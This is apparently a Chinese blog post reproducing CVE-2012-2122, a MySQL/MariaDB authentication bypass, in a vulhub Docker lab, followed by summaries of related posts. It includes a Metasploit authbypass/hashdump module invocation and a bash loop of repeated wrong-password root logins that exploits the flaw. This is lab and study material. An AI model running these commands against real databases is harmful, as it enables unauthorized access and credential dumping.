CVE-2012-2122 mysql/mariaDB身份认证漏洞

已于 2024-08-13 17:08:40 修改
阅读量386 收藏
点赞数 1
文章标签: mysql mariadb 数据库
于 2024-08-12 23:11:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68177269/article/details/141143989
版权
简介:

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,不断的尝试登录连接,回导致MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

一、搭建环境

 下载安装vulhub靶场环境

使用docker-compose 创建靶场环境。

二、msf漏洞scan探测 
search CVE-2012-2122

use auxiliary/scanner/mysql/mysql_authbypass_hashdump 
set rhosts 192.168.44.128


run

不知道为什么没跑出来🥴 

但是可以漏洞利用

三、漏洞利用
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 ; done

可见经过大数量的暴力登录之后,直接不需要密码登录到mysql

白8080
关注
CVE-2012-2122Mysql身份认证漏洞
weixin_45253622的博客
05-27 6381
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现: 漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
Mysql身份认证绕过漏洞CVE-2012-2122)复现
君莫hacker的博客
09-12 2523
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
【vulhub】MySql身份认证绕过漏洞复现(CVE-2012-2122)
errorr0
08-09 1738
CVE-2012-2122
CVE-2021-27928漏洞复现
wuuconix's blog
05-20 4183
CVE-2021-27928漏洞复现 漏洞简介:它是一个MariaDB的远程命令执行漏洞,存在于10.2.37之前的10.2版本,10.3.28之前的10.3版本,10.4.18之前的10.4版本以及10.5.9之前的10.5版本。 复现环境 攻击机:Ubuntu 20.04.2 LTS 目标机:mariadb/server:10.3.13 docker容器 复现准备 我们需要在我们的攻击机上安装 metasploit-framework 框架。安装步骤见Nightly Installers
Mysql 身份认证绕过漏洞CVE-2012-2122
NLXHBM的博客
04-24 2947
漏洞原理:当连接 MariaDB / MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说,只要知道用户名,不断尝试就能够直接登入 SQL 数据库。 修复:对数据库进行升级打补丁;在防火墙上关闭mysql端口 1.环境搭建 使用nmap扫描 使用nmap 对靶机进行扫描,查看所开放的端口,以及扫描数据库的版本信息 masscan --rate=10000 --ports 0-...
Mysql身份认证漏洞 CVE-2012-2122
limb0的博客
11-08 807
Mysql身份认证漏洞 CVE-2012-2122 一、漏洞介绍 MariaDBMySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制,也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只...
Mysql身份认证绕过漏洞复现(CVE-2012-2122
m0_74887243的博客
03-21 182
Mysql身份认证绕过漏洞复现(CVE-2012-2122
Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 344
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4726
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
mysql身份认证绕过漏洞复现(CVE-2012-2122
weixin_53730939的博客
03-12 1475
mysql身份认证绕过漏洞复现(CVE-2012-2122
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1313
在一个虚拟机中操作。
数据库安全:MySQL 身份认证漏洞CVE-2012-2122
最新发布
网络安全领域___专研者.
11-10 776
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授权的方式进行访问 MySQL 数据库
CVE 2012-2122
qq_56895581的博客
05-19 298
我们使用exp在对应版本上的服务进行登陆时,即便密码错误也能成功以root用户登录
MySQL 概率性任意密码_CVE-2012-2122: Security vulnerability in MySQL/MariaDB sql/password.c(概率性任意密码登mysql)...
06-09
这是一个关于MySQL/MariaDB的安全漏洞,被称为CVE-2012-2122。该漏洞存在于sql/password.c文件中,可以导致概率性任意密码登mysql。攻击者可以利用该漏洞通过特定的步骤创建一个恶意用户并获取访问权限,然后可以执行任意操作,包括修改或删除数据等。该漏洞已经被修复,建议所有用户尽快升级到最新版本以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值